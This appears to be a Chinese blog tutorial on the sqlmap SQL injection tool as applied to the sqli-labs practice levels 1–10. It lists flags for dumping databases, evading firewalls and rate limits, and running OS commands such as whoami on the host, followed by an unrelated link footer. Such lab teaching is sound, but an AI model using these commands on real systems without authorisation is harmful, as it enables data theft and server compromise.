sqlmap使用教程(sqli-labs1-10详解)
-u 指定目标URL (可以是http协议也可以是https协议)
-d 连接数据库
--dbs 列出所有的数据库
--current-db 列出当前数据库
--tables 列出当前的表
--columns 列出当前的列
-D 选择使用哪个数据库
-T 选择使用哪个表
-C 选择使用哪个列
--dump 获取字段中的数据
--batch 自动选择yes
--smart 启发式快速判断,节约浪费时间
--forms 尝试使用post注入
-r 加载文件中的HTTP请求(本地保存的请求包txt文件)
-l 加载文件中的HTTP请求(本地保存的请求包日志文件)
-g 自动获取Google搜索的前一百个结果,对有GET参数的URL测试
-o 开启所有默认性能优化
--tamper 调用脚本进行注入
-v 指定sqlmap的回显等级
--delay 设置多久访问一次
--os-shell 获取主机shell,一般不太好用,因为没权限
-m 批量操作
-c 指定配置文件,会按照该配置文件执行动作
-data data指定的数据会当做post数据提交
-timeout 设定超时时间
-level 设置注入探测等级
--risk 风险等级
--identify-waf 检测防火墙类型
--param-del="分割符" 设置参数的分割符
--skip-urlencode 不进行url编码
--keep-alive 设置持久连接,加快探测速度
--null-connection 检索没有body响应的内容,多用于盲注
--thread 最大为10 设置多线程
--delay
有些web服务器请求访问太过频繁可能会被防火墙拦截,使用--delay就可以设定两次http请求的延时
--safe-url
有的web服务器会在多次错误的访问请求后屏蔽所有请求,使用--safe-url 就可以每隔一段时间去访问一个正常的页面。
--tamper
语法:--tamper ["脚本名称"]
当调用多个脚本的时候,脚本之间用逗号隔开,调用的脚本在 sqlmap文件夹下的 tamper 文件夹中
脚本信息
-v ["x"]
使用sqlmap注入测试时,可以使用 -v [x] 参数来指定回显信息的复杂程度, x 的取值范围为[0~6]:
--level
level有5个等级,默认等级为1,进行Cookie测试时使用--level 2 ,进行use-agent或refer测试时使用--level 3 ,进行 host 测试时使用--level 5
–-os-cmd=["命令"] 或 --os-shell=["命令"] 执行系统命令
利用sql-labs-less1测试 whoami 命令
sqlmap -u "http://192.168.0.6/sqli-labs-master/Less-1/?id=1" --os-cmd=whoami
选择web服务器支持的语言
选择web服务器的可写目录
[1] 使用默认的
[2] 自定义位置
[3] 自定义目录列表文件
[4] 暴力搜索
我在本地测试,节省时间,我选择2 ,自定义路径,然后把路径输入在下面
执行命令后的返回结果
以下关卡均可用get型的方法,常规注入
sql注入检测
get型:
语法:sqlmap -u ["url"]
post型:
先使用bp把提交的数据包保存下来
或者直接
加上post提交的参数
语法:sqlmap -r ["请求包的txt文件"]
sql-labs -less1~sql-labs-less9
获取当前数据库名称:
语法:sqlmap -u [“url”] --current-db
获取指定数据库的表名:
语法:sqlmap -u [“url”] -D [‘数据库名’] --tables
获取指定数据库指定表中的字段:
语法:sqlmap -u [“url”] -D [‘数据库名’] -T[‘表名’] --columns
获取指定数据库指定表的指定字段的字段内容:
语法:sqlmap -u [“url”] -D [‘数据库名’] -T [‘表名’] -C [‘字段名1,字段名2,…’] --dump
sql-labs-less10
提升等级 -level 2
sqlmap使用教程(sqli-labs1-10详解)相关推荐
- Nmap扫描教程之基础扫描详解
Nmap扫描教程之基础扫描详解 Nmap扫描基础扫描 当用户对Nmap工具了解后,即可使用该工具实施扫描.通过上一章的介绍,用户可知Nmap工具可以分别对主机.端口.版本.操作系统等实施扫描.但是,在 ...
- python动态类型的坑_python进阶教程之动态类型详解
动态类型(dynamic typing)是Python另一个重要的核心概念.我们之前说过,Python的变量(variable)不需要声明,而在赋值时,变量可以重新赋值为任意值.这些都与动态类型的概念 ...
- get方法报空指针_C++基础教程之指针拷贝详解
C++基础教程之指针拷贝详解 指针是编程人员的梦魇,对C语言的开发者是如此,对C++的开发者也是如此.特别是在C++中,如果不注意处理类中的指针,非常容易出问题.如果朋友们不相信可以看看下面的代码: ...
- 【STM32】标准库与HAL库对照学习教程八--串口通信详解
[STM32]标准库与HAL库对照学习教程八--串口通信详解 一.前言 二.准备工作 三.通信的基本概念 1.通信方式 2.串行通信与并行通信 (1)串行通信 (2)并行通信 3.异步通信与同步通信 ...
- 我的世界服务器不显示计分板,我的世界计分板教程 计分板指令详解
<我的世界计分板教程 计分板指令详解>由会员分享,可在线阅读,更多相关<我的世界计分板教程 计分板指令详解(9页珍藏版)>请在人人文库网上搜索. 1.我的世界计分板教程 计分板 ...
- AndroidManifest.xml文件配置教程及相关指令详解
AndroidManifest.xml 是每个android程序中必须的文件,它位于整个项目的根目录.我们每天都在使用这个文件,往里面配置程序运行所必要的组件,权限,以及一些相关信息.但是对于这个文件 ...
- 我的世界java版记分板_我的世界计分板教程 计分板指令详解
我的世界计分板教程 计分板指令详解.啊下面就给大家详细的介绍一下我的世界中的计分板吧!计分板的指令主要是objectives.players.teams.那下面就将这三个指令教程详细的分享一下吧!希望 ...
- javascript教程:console.log 详解
对应WEB程序员,console.log 可以说是神器,极大地方便了程序开发.程序猿:学习了,用Console写日志比alert方便多了. console.log(object[, object, . ...
- 视频教程-wordpress建站教程之环境部署详解课程-PHP
wordpress建站教程之环境部署详解课程 著名的photoshop狂热者,讲课深入浅出,生动风趣.参与编写多部photoshop视频教程,数码照片处理教程等,麒麟设计教程网特聘主讲人. 梁田聪 ¥ ...
- eval 函数 java_[Java教程]eval()函数用法详解
[Java教程]eval()函数用法详解 0 2015-12-14 11:00:26 eval()函数用法详解: 此函数可能使用的频率并不是太高,但是在某些情况下具有很大的作用,下面就介绍一下eval ...
最新文章
- 第三次学JAVA再学不好就吃翔(part83)--泛型类
- 怎样成为一名更优秀的程序员?我总结出 7 条建议
- 机器学习 | 算法笔记- 集成学习(Ensemble Learning)
- OPPO Find X2系列获蓝牙5.1认证:距离正式亮相又近了一步
- IoT、3D 扫描抢救巴黎圣母院!
- 三个箭头循环标志_城市标志系统的概念和类别
- 第51条:精简initialize与load的实现代码
- 管理c语言源代码,c语言源代码---------------个人图书管理系统
- 【网络安全】最全渗透学习攻略
- linux下终端快捷键
- Struts2默认拦截器
- wsimport简单实现WebService
- Android原生框架--Xui使用
- C语言中括号的用法[]
- python乒乓球比赛规则介绍_乒乓球比赛规则简介
- mac 安装问题汇总
- 大气颗粒物 PMF 源解析
- SQL SERVER 2008 R2 故障转移群集实验总结
- Flutter 新一代图形渲染器 Impeller
- PS从入门到精通第3节
热门文章
- 字体字号磅数大小对照表
- qt.qpa.plugin: Could not load the Qt platform plugin xcb in /root/PycharmProjects/pythonPr
- etree解析xml_在python中使用Etree解析XML配置文件
- 三菱plc c语言模块,FX5-80SSC-S 三菱PLC简易运动控制器模块
- 形象标识 新松机器人_新松SIASUN工业机器人标志logo设计,品牌设计vi策划
- Day 35 年会抽奖 + 抄送列表
- 【书记舞】MMD动作+镜头+配音下载
- android 简书饿了么,分析饿了么详情页布局
- ADOBE PS镜像某个图层
- java并发测试工具_Java并发测试工具类